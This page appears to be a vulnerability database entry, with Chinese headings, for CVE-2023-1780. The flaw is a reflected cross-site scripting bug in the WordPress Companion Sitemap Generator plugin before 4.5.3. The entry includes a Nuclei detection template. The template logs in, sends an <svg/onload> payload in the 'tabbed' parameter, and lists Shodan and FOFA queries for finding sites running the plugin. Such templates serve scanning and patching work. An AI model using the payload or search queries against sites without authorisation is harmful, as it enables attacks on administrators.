CVE-2023-1780: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Companion Sitemap Generator | POC: 已公开

漏洞描述

The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.

PoC代码[已公开]

id: CVE-2023-1780

info:
  name: Companion Sitemap Generator < 4.5.3 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    The plugin does not sanitise and escape some parameters before outputting them back in pages, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin.
  remediation: Fixed in version 4.5.3
  reference:
    - https://wpscan.com/vulnerability/8176308f-f210-4109-9c88-9372415dbed3
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1780
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-1780
    cwe-id: CWE-79
    epss-score: 0.10298
    epss-percentile: 0.92899
    cpe: cpe:2.3:a:codeermeneer:companion_sitemap_generator:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: codeermeneer
    product: companion_sitemap_generator
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/companion-sitemap-generator/
    fofa-query: body=/wp-content/plugins/companion-sitemap-generator/
    publicwww-query: "/wp-content/plugins/companion-sitemap-generator/"
  tags: cve,cve2023,wpscan,wp,wordpress,wp-scan,xss,authenticated,codeermeneer

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In
      - |
        GET /wp-admin/tools.php?page=csg-sitemap&tabbed=%3Csvg%2Fonload%3Dalert(document.domain)%3E HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "re not allowed to view")'
          - 'contains(body_2, "<svg/onload=alert(document.domain)>")'
        condition: and
# digest: 4a0a00473045022021bd0c2f9cae95ea7e6f1e7814e3e801f79034a094479bde855a4f2cc679acf10221008f14ecf72457a87d481b1ddc7674a095f7d29d9d343100a4354eb49548518197:922c64590222798bb761d5b6d8e72950